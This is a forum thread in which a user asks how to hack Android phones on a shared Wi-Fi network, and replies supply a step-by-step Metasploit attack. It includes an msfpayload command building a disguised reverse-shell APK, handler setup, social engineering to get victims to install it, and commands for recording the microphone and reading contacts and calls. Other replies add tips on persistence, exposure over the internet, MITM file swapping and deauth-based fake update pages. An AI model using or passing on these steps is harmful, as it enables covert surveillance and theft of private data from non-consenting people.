Forum Thread: How to Hack a Android Phone Connected on a Same Wifi Router

Hello
i want to how to hack a android phones connected to a same wifi router which i'm connected to..

32 Responses

This is fairly simple. All you need is metasploit, and a bit of social engineering skills. What you do is you open a terminal, and put in:

msfpayload android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /root/Desktop/coolapp.apk

This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked.

First we will open the metasploit console by typing "msfconsole"
Once the metasploit console is open we will type,

use exploit/multi/handler
Hit return and follow as I do
set payload android/meterpreter/reverse_tcp
Now you should have the payload all set, now we will set up the connections
set lhost (your lan ip address)
Now your local host is set up, but we still need to set up the port.
set lport 8080

Hit enter, now from here we use some social engineering to give the file on the desktop titled, coolapp.apk, to someone who will open it on their android phone. Once you have given someone the app and they are about to open it, go back to your metasploit console and type:

exploit

This should open a connection soon with the target android phone where you can do things like, record their microphone, take a picture on their camera, look at their calls, look at their contacts, and look at their address.

Dude can you explain it a little bit more i really intrested and im waiting for your replay!!

go on other websites and read about
using fatrat to develop backdoor and using metasploit to listen that.
and using it world wide over WAN too using portforwarding or ngrok command lines.
thankyou.

Great tutorial!
Can you convert this into msfvenom command line?

Can you speak in English @CAMERO N GLASS :D just a 14 Yrs. Old Boy

Can Any One Help Me Please I Tried Every Thing about 40 Times But When i Copy .apk To My Android for installing it shows

(app not installed) Is There Any Solution ? I Put this Ap On Many ANdroid Version Phones But Still Got That Error

sign your apk file and make sure that your android accepts installations from unknown sources..

Many smartphones will not prompt you of the app having malicious code but just not allow you to install it some phones (which till now i have tested on ) are google phones -Nexsus and Xiomi , if you wanna install the app you first need to get ur phone rooted and escalate ur privileges to install the app

go and search on the internet how to exploit devices using a backdoor.
you should be using fatrat technique instead of producing a payload through metasploit.
and not only over lan . using port forwarding or ngrok , you can also exploit different platforms over WAN.
thankyou

I was wondering if there is a way to target a specific IP without having to make the target install the apk?

there must always a host installed on another device to listen to.
if you want to control a specific task on another machine.
but if you want a way through in just sitting at home.
you will have to find out the vulnerabilities of the system .

Can Anyone please tell that how to perform the above procedure in Windows, I tried to perform it in Command prompt of Windows but it say the Window cannot find the path specified,,,,,please someone tell me how to hack and android phone through windows

This hack, like nearly all hacks, can only be done in Linux. Take some time to learn Linux by reading my Linux series on Null Byte.

you need to download metasploit for your windows

I have done all the above steps perfect and succesfully setuo a connection niw i want to know the commands for listening to microphone

recordmic or better type ? when the meterpreter session started

when you get into metasploit and set up the listener .
the command is (record_mic -20)
where 20 is the timelimit of the clip you want to record.

Can i change that apk file with something else...
i mean if i type this command
msfpayload android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /root/Desktop/movies.txt

Will it work????

i have a question in my mind. if anyone started it once and restarts its cellphone . is it is necessary to open the apk once more ?

hope you will reply soon

yes.
but if you designed the backdoor to reactivate itself on startup. surely it will.
normally it doesnt do.

I have a question... Once you have identified that it is a phone on your router, how do you extract a phone number or e-mail to send that .apk to

You can use dsniff for man in the middle attack and replacing downloaded file by victim with your apk.

can u actually change what files are being downloaded by a mitm victim?!

How do you block people from hacking your devices??

Help I have nosey hackers...!

Did you ever get this info??
Yea I've had the same problems...im ready just to change routers,and buy new SIM cards..
I need to know if I've been hacked,or even worse cloned phones...

This apk is not working on my android device
and what can i do with this i mean commands please:

Guys this method will never work in any real situation. So think that you meet someone for the first time and you need to stole or take something from his phone. I dont think that someone will go and say this person that he want to try some program on his phone or do social engineering stuffs. So this method dont work in real life and I am sure that "hackers" do this thing in more professional ways for example trying to finde some mistake in network system(open ports or irregular network traffic) instead of doing social engineering stuffs. So if you want to be a real" hacker" learn about the system - learn like lerning at university or at school. Read books about that or even watch youtube videos about this things.

My IP address in Kali is 10.0.2.(something) and my IP address in Mobile is 192.168.(something) can these two belong to same network?to hack my android

Hi, it is not important to be on the same wifi for hacking android using a backdoor. the first IP address can be your public IP address of your Kali Linux or you may use Kali Linux in a virtual machine but anyway if you need to hack an android phone over the internet you need to forward the port which you are using to make the connection from your backdoor, cause the firewall won't let you. so this is the difference between a target in the same wifi and over the internet. if your target is in the same wifi I recommend you to use a kind of MITM Attack, for example, make a fack page which is saying your device need to update for connecting to the internet ( we send some packets with aireplay-ng which can make the device down from the network it means the target would not have any internet connection )and after opening a session you can stop sending packets. if you need to know how to do this kind of attack take a look to

THIS POST.

Share Your Thoughts

  • Hot
  • Active